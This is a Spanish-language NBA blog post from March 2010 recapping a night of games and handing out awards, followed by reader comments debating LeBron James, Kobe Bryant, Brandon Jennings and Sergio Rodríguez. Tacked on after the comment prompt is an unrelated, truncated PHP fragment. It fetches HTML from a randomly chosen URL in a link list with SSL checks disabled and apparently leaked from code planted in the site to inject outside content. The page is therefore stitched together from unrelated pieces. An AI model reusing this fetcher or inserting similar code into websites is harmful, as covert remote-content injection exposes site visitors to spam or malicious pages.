La Crónica (03/03/2010)

04 de March de 2010 por telekoman

Largísima y apretada jornada con nada más y nada menos que 12 partidos. Así que vamos a intentar ser breves.

Atlanta sigue en la lucha por la tercera plaza del Este ganando por casi 20 puntos a Philadelphia gracias a Marvin Williams y un Jamal Crawford en dulce estado forma. De nada sirvieron los 30 puntos de Louis Williams. Orlando también continúa imparable y gracias principalmente a su quinteto titular se libró de los Warriors sin mayor problema. Boston, por su parte, retomó la senda de la victoria y también ganó con más de 20 puntos de ventaja, esta vez a Charlotte, que se desinfla preocupantemente. 27 puntos de Pierce parecen decirnos que está recuperado y los 80 de Charlotte que la defensa de los Celtics intenta recuperarse. Haremos bien en no darles por muertos todavía. Y el que faltaba en el Este, Cleveland, también ganó sin apuros a los “ya de antemano derrotados” Nets. Con esto tenemos que los primeros del Este han ganado con una suficiencia insultante. ¿Alguien decía que el Este había mejorado? En los otros dos partidos que involucraban sólo equipos del Este, New York, con Sergio en el banquillo, pasó por encima de los Pistons gracias a los más de 20 puntos que metieron 4 de los integrantes del quinteto titular, y Milwaukee se aferra a su septima plaza ganando a Washington con Ilyasova cerca del triple doble.

En un partido importantísimo para no alejarse demasiado de la 8ª plaza del Oeste, Memphis ganó en New Orleans con mucho suspense por tan sólo 4 puntos. El día bueno lo tuvo hoy Conley que se fue hasta los 26 puntos,  7 asistencias y 5 importantísimos robos de balón, mientas que Randolph sumó 23 puntos y 11 rebotes. Por los Hornets la parejita de moda volvió a hacer un buen partido, pero su equipo sigue perdiendo. Algo falla.

Houston, que intenta no alejarse de postemporada, ha dado otro paso atrás al perder hoy contra Sacramento en casa por 3 puntos. El culpable no ha sido esta vez Evans, que se ha quedado en números bastante discretos, si no Landry, que contra su ex-equipo salió extramotivado apuntándose 22 puntos y 10 rebotes. Por parte de los Rockets el más enchufado ha sido Scola que a sus 19 puntos ha sumado nada menos que 18 rebotes.

Dallas continúa a un nivel altísimo y consigue su 9ª victoria consecutiva, esta vez frente a un rival algo más que asequible, Minnesota, eso sí con más problemas de lo esperado. Ha hecho falta un buen  partido de Nowitzki y de Terry y eso que Al Jefferson no estaba.

Finalmente 3 exhibiciones, Carmelo se comió a Durant en la paliza de los Nuggets a los Thunder, Stoudamire destrozó a los Clippers y los Blazers destrozaron a los Pacers con un gran Rudy.

PREMIOS

MVP: Impresionan los 26 puntos, 7 rebotes, 14 asistencias de LeBron James; los 30-8-5 de Melo secando a Durant; los 21 puntos, 18 rebotes y 8 asistencias de David Lee… pero nos quedamos con los 30 puntos y 14 rebotes ante Kaman de Amare Stoudemire.

El Rookie: Le falta un peldaño para llegar a las animaladas de Chris Paul… pero ahí está Collison con 17 puntos, 14 asistencias  y 5 robos.

La sorpresa: Está jugando bien Mike Conley esta temporada pero no suele ser habitual que demuestre tal capacidad de liderato como anoche. Bien por el bueno de Mike.

La decepción: Uno que tiene a Richard Hamilton como ejemplo de muchas cosas siente más vergüenza que nadie señalando el vídeo en NBA.com de ejemplo de cómo defienden los actuales Pistons. Os lo describo: Bynum y Rip construyen jugada, mandarinazo de Hamilton y aún llega antes a canasta contraria en el contraataque Al Harrington con 3 metros de desventaja con respecto a los otros dos. A eso le llamo yo tocarse las pelotas a dos manos. Así les va a los Pistons. Quién les ha visto y quién les ve.

El mayor esfuerzo en vano: Hacía tiempo que no lo veíamos por aquí. Este premio fue el año pasado el suyo: Granger anotó ayer 30 de los 79 puntos de su equipo. Está claro que se vive mejor sin las garras de Artest por medio.

Comenta

18 comentarios a esta entrada

  1. Rompe dice:
    #1

    “Impresionante” la temporada de Jennings, sí… 4 partidos buenos a comienzos de año, incluidos esos increibles 55 puntos… y ya. Anoche, 2-12, con 1-6 en triples. 37% en tiros de campo de promedio de la temporada, tristísimo! Vale que es un rookie y le queda mucho por mejorar (no dudo que llegará a ser un grande), pero de ahí a tirarse todo lo que pille en su primera temporada…

      Citar

  2. Chris dice:
    #2

    Cada vez que veo los Highlights de los Cavs en nba.com me doy cuenta de que el MVP es de Lebron. Está un peldaño por encima de los Kobe, Wade, Bosch y Durant. En madurez y en capacidad para hacer mejores a sus compañeros (que muchos de ellos ya son muy buenos de por si). Del rendimiento particular ni hablaré ya que sus números son incontestables. ¡Larga vida al Rey!
    PD Y que conste que esto lo dice un fan de Lakers

      Citar

  3. TheDeerHunter dice:
    #3

    Pues no sé que decirte, Chris… por más que lo intento no puedo deducir ni de los highlights ni de los box score que LeBron está un peldaño por encima de… en concreto de Kobe.
    En ningún caso en madurez (ni remotamente!!!) y mucho menos en capacidad de hacer mejores a sus compañeros. El rendimiento particular, efectivamente, es incontestable, pero será la única razón si es que se lo terminan dando.

    Reconozco que ahora mismo tiene ventaja por el bajón físico de Kobe… pero dependerá del tramo final para asegurarlo. Con el calendario también juega con ventaja… así como en la conferencia que le genera ese calendario.

      Citar

  4. Txusma dice:
    #4

    A Jennings le ha afectado más que nadie el Rookie Wall. Pero lo suyo no ha sido un simple muro, ha sido todo un dique de contención!! Sus porcentajes son tristísimos en los últimos meses y habrá que ver si al final de la temporada el cómputo no sale más bien negativo… Eso sí, los Bucks están en Playoffs y él debe tener su parte de culpa.
    Sobre el MVP, yo creo que Kobe es actualmente el mejor jugador de baloncesto del mundo, por fundamentos, por calidad, por talento, por madurez y por todo en conjunto, pero el premio se lo llevara Lebron pq cada partido es una animalada… Pero una cosa no otorga la otra.

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Parece ser que Garnett va enchufándose poco a poco.

    No me molan ni Kobe ni Lebron.

    Pepu MVP¡¡¡¡¡¡

      Citar

  6. Love Denise dice:
    #6

    parece que a Sergio y a sus defensores se le empiezan a acabar las excusas, ya nadie puede culpar a Mcmillan y su sistema de juego. Abrid los ojos, Sergio es un jugador del montón hacia abajo, sin tiro, sin defensa, sin penetración, sin saber leer el juego en estático, y el baloncesto es algo más que una jugada bonita o el poder cambiar el ritmo durante 5 min. (unicas cualidades de Sergio). Su sistio natural es el Estudiantes y pelearle la titularidad a….Albert Oliver, ó ser un 3er base NBA y jugar los minutos de la basura (cosa que cualquier profesional podría hacerlo), ni siquiera es un buen base titular para un buen equipo de Euroliga. Y los 20ypico minutos que juega en New York no se deben a su calidad, se deben a la suerte que siempre le ha acompañado por USA de ir a parar a equipos perdedores sin ninguna competencia en el puesto de base.

    Habláis de Jennings, pues el partidito de Tyreke de hoy es para enmarcarlo (4/22 en tiros y 5 tapones recibidos)

      Citar

  7. sabas dice:
    #7

    Madre mia, Love Denise, le has cojido entre ojo a Sergio. De todas formas no te falta razon. El problema es que desde que se ha ido a la NBA parece que no ha progresado nada. Vomos ha darle mes y medio al chaval haber si espabila. Si al final acaba en Europa, si es en un grande, es que tiene muy buen representante.

      Citar

  8. Rompe dice:
    #8

    El partido de Tyreke precisamente hoy no ha sido para tirar cohetes, pero es una excepción en su temporada. Desgraciadamente el partido de Jennings hoy es la tónica general de los últimos meses…

      Citar

  9. Love Denise dice:
    #9

    hey sabas, no le tengo manía al chacho, es más, le deseo lo mejor y me gustaría que triunfara en la Gran Manzana, pero ya es hora de que la prensa deje el chovinismo a un lado, sea objetiva y realista, y se le deje de llamar el “spanish chocolate”, “el nuevo nash”, y otras payasadas más. Debemos comprender y entender que no todos los españoles que cruzan el charco van a triunfar, y con menos probabilidad de triunfar cuando lo cruzan sin haber demostrado ni haber hecho nada especial en el Viejo Continente.
    De dónde no hay no se puede sacar nada
    Hago una petición para que los padres de los Gasol se pongan manos a la obra y creen otros dos jugones. Ánimo, todavía sois jovenes.

      Citar

  10. Toni dice:
    #10

    Nadie habla de un medioespañol (perdonad la parida), como es Serge Ibaka que el año pasado estaba por aqui al lado de mi casa y últimamente le está robando minutos a Jeff Green en uno de los equipos más en forma y de moda en la liga y probablemente juegue post-temporada.

    Veremos a ver como acaba lo de Sergio pero parece que se vuelve a nublar y ojalá me equivoque.

      Citar

  11. PIRATA dice:
    #11

    Love Denise, los padres de Gasol lo tienen un pcoc crudo para procrear mas “monstruos” se separaron hace unos dos meses. De todas maneras estamos esperando a la tercera joya.

      Citar

  12. kantonyo dice:
    #12

    Si, sobre Serge Ibaka, habló Love Denis hace una semana diciendo que era el tipico paquete “europeo” que juega en la NBA “regalado”. Ayer 15 puntos y 13 rebotes en 27 minutos.

    Lo que no entiendo Love Denise es pq nos juzgas a los demás de chovinismo por pensar que Sergio es un buen jugador y en cambio el único que usa su lugar de procedencia para juzgar a los jugadores eres tu.

      Citar

  13. sayim dice:
    #13

    No es santo de mi devocción, pero al César lo que es del César: si LeBron no se lleva el MVP promediando 30 puntos, 7 rebotes y casi 9 asistencias, con mas del 50% en tiros de campo, yo no entiendo nada de baloncesto.

      Citar

  14. TheDeerHunter dice:
    #14

    No me siento chovinista defendiendo a Sergio, como en su día no lo sentía cuando alucinaba de que gente como Saras o Djorjevik se comieran los mocos en el equipo de turno. Tampoco me siento chovinista prefiriendo a años luz el baloncesto de Sergio que el que ofrece el megacerrojero de McMallon. Es que te equivocas de plano con ese punto de vista.

    Tampoco voy a entrar a valorar el tema de Sergio día sí y día no. Hasta el rabo todo es toro… no creo que por un partido bueno o malo que haga haya que sacar el hacha cada vez en un sentido o en otro. Por mi parte estoy 100% que terminará haciendo algo grande porque aprecio el talento… el tipo es jovencísimo y puede triunfar aquí o allí o donde le pongan.

    Y no hay excusas. No le pongo el listón de que tenga que hacer dobles dobles a mansalva como comentaste el otro día. Pero ni de lejos le considero un desgraciado… es un privilegiado, y mientras no se demuestre lo contrario un profesional como la copa de un pino. Hay cosas que no dependen de él, eso sí. Y así como comentabas el otro día que Daimiel no tiene siempre la razón también te digo que los americanos y su filosofía del baloncesto tampoco la tienen siempre, sea cual sea la conclusión que saquen de Sergio.
    Meditaba sobre una reflexión, esta tarde. Tanto hablar de potencial, tanto valorarlo en los drafts… cuando en realidad hay muy poco cuidado de ese potencial cuando se consigue. A excepción de los grandísimos exponentes, llámense LeBron, Wade o Kobe que terminarían triunfando casi ellos sólos veo muy poco trabajo de formación (por no decir ninguno) que parta realmente del máximo responsable técnico del equipo. Muchos jugadores están completamente desvalidos en ese sentido. Me parece que ese es un grave error por parte de esta organización. Quizás cuando excasee más la pasta como parece se avecina empiecen a valorar lo que cada uno tiene en su casa y aprovechen esos jugadores con potencial en los que han invertido rondas y dinero.

      Citar

  15. Love Denise dice:
    #15

    mmmmm pirata no sabía ese dato de los padres de los Gasol

    @kantonyo y deer: no os he llamado chovinistas a vosostros personalmente, ahora, si os dais por aludidos,,,allá vosotros.; acaso alguién ha dicho que sea Sergio un desgraciado?? al revés, es un tipo extremadamente afortunado que haciendo tan poco se está forrando a dólares, y en un año cobra lo mismo que cobraremos el resto de mortales en nuestra vida. Como persona es afortunado, pero como baloncestista acabará como la “eterna promesa”.

    @kantonyo: no inventes cosas que yo no he dicho, dije que iBaka nohubiera jugado en la NBA hace 15 años, que no es lo mismo que decir que es un paquete, me refería a que el listón para jugar en la NBA ha bajado mucho, e Ibaka, hace esos años, no hubiera firmado esos números.

      Citar

  16. kantonyo dice:
    #16

    Has llamado chovinista a los que creen que Sergio es un buen jugador, en el sentido general, por lo tanto perdone que me de por aludido.

    Y no invento nada, pusistes en el mismo saco a Turiaf, Petro con Ibaka y Sergio, y eso es llamarlo paquete claramente o decir que está en su mismo nivel. Si Ibaka fuera de Illinois estarias hablando de que tiene 19 años y va a ser un Dominique Wilkins.

    Hace 15 años el nivel medio-bajo de la NBA era igual o peor que el actual, más bien yo pienso que es mejor el de ahora. Si los grandes jugadores europeos no triunfaron era por que los americanos pensaban como tu en el caso de Sergio, miraban su nacionalidad para juzgar si eran validos para ser un jugador suplente o titular..

    Han tenido que ir autenticas estrellas como Arvidas, Drazen, Dirk o Pau para hacerles ver que el baloncesto europeo esta a un gran nivel.

    Por mi parte dejo zanjado el debate, creo que está todo dicho respecto a Sergio, sólo él podrá demostrar su talento en la NBA o dar la razón a los que consideran que no es válido y está de prestado.

      Citar

  17. Love Denise dice:
    #17

    Cada uno tiene su opinión sobre los jugadores, y rspeto a los que le gustan Sergio, como tu, e incluso cuando juegue bien, seré el priemro en reconocerlo.
    He llamado chovinista, NO a la gente que lo apoya, sino a la PRENSA (LEÉLO BIEN) que dice memeces COMO “NUEVO nASH” , Mcmillan le tiene manía…y ese tipo de cosas, cuando aún no ha demostrado ni la milésima parte del canadiense. Tú como defensor de Sergio, no te dan ganas de vomitar cuando lees esas cosas en prensa? (que se suponen que son periodistas serios y especializados)

      Citar

  18. Love Denise dice:
    #18

    Lo del nivel medio… yo sigo pensando que era mayor antes, mucho mayor, pero en fín, no es algo que se pueda medir.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>